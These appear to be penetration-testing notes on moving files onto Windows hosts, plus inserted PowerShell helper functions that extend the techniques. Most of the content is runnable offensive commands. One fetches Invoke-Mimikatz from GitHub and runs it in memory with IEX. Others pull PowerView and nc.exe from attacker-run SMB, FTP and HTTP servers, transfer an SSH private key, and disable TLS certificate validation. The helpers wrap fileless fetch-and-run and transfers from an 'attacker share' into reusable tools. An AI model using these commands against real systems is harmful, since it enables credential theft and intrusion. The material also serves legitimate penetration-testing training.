- `fileless`: a threat that doesn't come in a file but runs in memory.

# Go-to

```powershell
certutil -urlcache -split -f http://<IP>/<FILE> <SAVE_NAME>
```

Note that `certutil` used as a downloader is widely signatured by AV/EDR, so expect it to be flagged on monitored hosts.

# PowerShell Base64 Encode & Decode

This method is convenient, but it's not always possible to use: Windows CMD has a maximum string length of 8,191 characters, and a web shell may error if you attempt to send extremely large strings.

Check the file's MD5 hash

```bash
md5sum id_rsa
```

Encode the SSH key to Base64 (`-w 0` disables line wrapping so the output is one string)

```bash
cat id_rsa | base64 -w 0;echo
LS0tLS1CRUd...
```

Decode with PowerShell functions

```powershell
PS C:\wook> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1CRUd..."))
```

Confirm the MD5 hashes match (`md5sum` prints lowercase hex, `Get-FileHash` uppercase; only the digits matter)

```powershell
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
```

# PowerShell Web Downloads

In any version of PowerShell, the `System.Net.WebClient` class can be used to download a file over HTTP, HTTPS, or FTP. The WebClient methods below download data from a resource either to disk or straight into memory.
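Before the WebClient methods, here is an added worked example for the Base64 method above (it is not code from the original note). It shows how to handle the 8,191-character CMD limit by sending the Base64 in fragments and reassembling them on the target, and how to turn the final hash comparison into a hard check rather than an eyeball comparison. The function name, the sample fragments (Base64 of the constructed string `hello world` plus newline) and the expected MD5 are assumptions for illustration.

```powershell
# Added example (not from the original note): decode a Base64 payload that was
# sent in fragments to stay under the CMD 8,191-character limit, then verify its
# MD5 against the digest produced by md5sum on the sending side.

function Write-Base64File {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string[]]$Chunks,      # Base64 fragments, in order
        [Parameter(Mandatory)][string]$ExpectedMd5    # hex digest from md5sum
    )
    # Reassemble the fragments into a single Base64 string and decode to raw bytes
    $bytes = [Convert]::FromBase64String(($Chunks -join ''))
    [IO.File]::WriteAllBytes($Path, $bytes)

    # md5sum prints lowercase hex, Get-FileHash uppercase: compare case-insensitively
    $actual = (Get-FileHash -Path $Path -Algorithm MD5).Hash
    if ($actual -ine $ExpectedMd5) {
        # Do not leave a truncated or corrupted file behind
        Remove-Item $Path -Force
        throw "MD5 mismatch for ${Path}: expected $ExpectedMd5, got $actual (transfer truncated or corrupted)"
    }
    return $actual
}

# Sending side (Linux) would produce the fragments with something like:
#   md5sum id_rsa
#   base64 -w 0 id_rsa | fold -w 8000     # each output line is one fragment under the CMD limit
# Constructed sample: "hello world\n" encoded as two Base64 fragments
$chunks = @('aGVsbG8g', 'd29ybGQK')
$md5    = '6f5902ac237024bdd0c176cb93063dc4'   # md5sum of "hello world\n"
Write-Base64File -Path "$env:TEMP\demo.txt" -Chunks $chunks -ExpectedMd5 $md5
```

Each fragment from `fold` is pasted as its own element of the array (or appended to a variable one at a time through the web shell), so no single command line ever exceeds the limit; the function only decodes once everything has arrived, and a mismatch deletes the partial file instead of leaving it on the target.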
**DownloadFile**

```powershell
PS C:\wook> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\wook> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')
```

**DownloadString - Fileless Method**

- Instead of downloading a PowerShell script to disk, we can run it directly in memory using the `Invoke-Expression` cmdlet or its alias `IEX` (the script still passes through AMSI and script block logging, so "fileless" does not mean unobserved)

```powershell
PS C:\wook> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
PS C:\wook> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX
```

**PowerShell Invoke-WebRequest**

Available from PowerShell 3.0 onwards (aliases `iwr`, `curl` and `wget`):

```powershell
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
```

# Common Errors with PowerShell

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents `Invoke-WebRequest` from parsing the response. `-UseBasicParsing` skips the IE-based HTML parsing (in PowerShell 6+ basic parsing is the default and the switch is a no-op).

```powershell
# Error
PS C:\wook> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
# Bypass
PS C:\wook> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
```

SSL/TLS secure channel error (typically a self-signed certificate on our own web server, or an old .NET default that only offers TLS 1.0/1.1)

```powershell
# SSL/TLS Error
PS C:\wook> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
# Bypass: disables certificate validation for the rest of the PowerShell session
PS C:\wook> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

# SMB Downloads

We can use SMB to download files.
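Before the SMB steps, here is an added example (not from the original note) that ties together the web download methods and the two workarounds from the previous section in one helper: basic parsing, a certificate-validation bypass that is scoped to the single request and then restored rather than left process-wide, an explicit TLS 1.2 selection, and an optional SHA-256 check before the content is executed in memory or written to disk. The function name, the `<IP>` placeholder and the hash parameter are assumptions for illustration.

```powershell
# Added example (not from the original note): one download helper that applies
# -UseBasicParsing and a scoped certificate-validation bypass, verifies the
# payload, and either saves it or runs it fileless with IEX.

function Get-RemoteScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [string]$OutFile,               # omit to keep the content in memory only
        [string]$ExpectedSha256,        # optional integrity check (sha256sum on the server side)
        [switch]$TrustAnyCert,          # self-signed cert on our own web server
        [switch]$Run                    # pipe to IEX instead of returning the text
    )
    # Older .NET defaults to TLS 1.0/1.1; servers that refuse those surface as
    # "Could not create SSL/TLS secure channel".
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    $savedCallback = [Net.ServicePointManager]::ServerCertificateValidationCallback
    if ($TrustAnyCert) {
        [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    }
    try {
        # -UseBasicParsing avoids the Internet Explorer first-launch dependency
        $content = (Invoke-WebRequest -Uri $Url -UseBasicParsing).Content
    }
    finally {
        # Put back whatever was there before, so the bypass does not outlive this call
        [Net.ServicePointManager]::ServerCertificateValidationCallback = $savedCallback
    }

    if ($ExpectedSha256) {
        # Hash the UTF-8 bytes; matches sha256sum for an ASCII/UTF-8 script without BOM
        $sha  = [Security.Cryptography.SHA256]::Create()
        $hash = ($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($content)) |
                 ForEach-Object { $_.ToString('x2') }) -join ''
        if ($hash -ine $ExpectedSha256) { throw "SHA256 mismatch for ${Url}: got $hash" }
    }

    if ($OutFile) { [IO.File]::WriteAllText($OutFile, $content) }
    if ($Run)     { $content | Invoke-Expression } else { return $content }
}

# Fileless: fetch from our own HTTPS listener (self-signed cert) and run in memory
# Get-RemoteScript -Url 'https://<IP>/PowerView.ps1' -TrustAnyCert -Run
# To disk, with an integrity check first:
# Get-RemoteScript -Url 'https://<IP>/PowerView.ps1' -OutFile "$env:TEMP\pv.ps1" -ExpectedSha256 '<sha256sum output>'
```

Restoring the callback in `finally` matters on shared or long-lived sessions: the one-liner from the note leaves every later HTTPS request in that process trusting any certificate, which is more than the transfer needs.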
We need to create an SMB server with [[smbserver.py]] from Impacket and then use `copy`, `move`, PowerShell `Copy-Item`, or any other tool that allows connection to SMB.

Create the SMB server

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

Copy a file from the SMB server (into the current directory)

```powershell
copy \\<IP>\share\nc.exe
```

---

Newer Windows versions block unauthenticated guest access to SMB shares by default, so create the SMB server with a username and password

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

Mount the SMB server with the username and password

```powershell
net use n: \\<IP>\share /user:test test
```

# FTP Downloads

Install the Python3 FTP server module `pyftpdlib`

```bash
sudo pip3 install pyftpdlib
```

Set up a Python3 FTP server (pyftpdlib listens on port 2121 by default; binding port 21 requires root)

```bash
sudo python3 -m pyftpdlib --port 21
```

After the FTP server is set up, we can perform file transfers using the pre-installed FTP client from Windows or PowerShell's `Net.WebClient`

```powershell
PS C:\wook> (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
```
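As an added example for the authenticated SMB transfer above (not code from the original note or from Impacket), the following pulls a file from the `share` served by `impacket-smbserver -user test -password test`, using a temporary PSDrive instead of a persistent `net use` drive letter, verifies the MD5 against the attacker-side `md5sum`, and removes the mapping afterwards so no credentialed share connection is left on the host. The function name, the server IP and the hash argument are assumptions for illustration.

```powershell
# Added example (not from the original note): copy a file from the authenticated
# Impacket share over a temporary PSDrive, verify its MD5, then drop the mapping.

function Copy-FromAttackerShare {
    param(
        [Parameter(Mandatory)][string]$Server,          # e.g. 192.168.49.128
        [Parameter(Mandatory)][string]$File,            # file name inside the share
        [Parameter(Mandatory)][string]$Destination,
        [string]$ExpectedMd5,                           # lowercase/uppercase both accepted
        [string]$Share    = 'share',                    # matches the impacket-smbserver arguments
        [string]$User     = 'test',
        [string]$Password = 'test'
    )
    $secure = ConvertTo-SecureString $Password -AsPlainText -Force
    $cred   = New-Object Management.Automation.PSCredential($User, $secure)
    $root   = "\\$Server\$Share"

    # New-PSDrive -Credential authenticates like `net use`, but needs no drive letter
    # and disappears when removed (or when the session ends)
    $null = New-PSDrive -Name 'xfer' -PSProvider FileSystem -Root $root -Credential $cred
    try {
        Copy-Item -Path "xfer:\$File" -Destination $Destination -Force
    }
    finally {
        # Always tear the mapping down, even if the copy failed
        Remove-PSDrive -Name 'xfer' -Force
    }

    if ($ExpectedMd5) {
        $actual = (Get-FileHash -Path $Destination -Algorithm MD5).Hash
        if ($actual -ine $ExpectedMd5) {
            Remove-Item $Destination -Force
            throw "MD5 mismatch for ${Destination}: expected $ExpectedMd5, got $actual"
        }
    }
    return $Destination
}

# Copy-FromAttackerShare -Server 192.168.49.128 -File nc.exe -Destination "$env:TEMP\nc.exe" -ExpectedMd5 '<md5sum output>'
```

The hash check is the same idea as the Base64 section: the attacker side computes `md5sum nc.exe` once, and the target refuses to keep a file that does not match it.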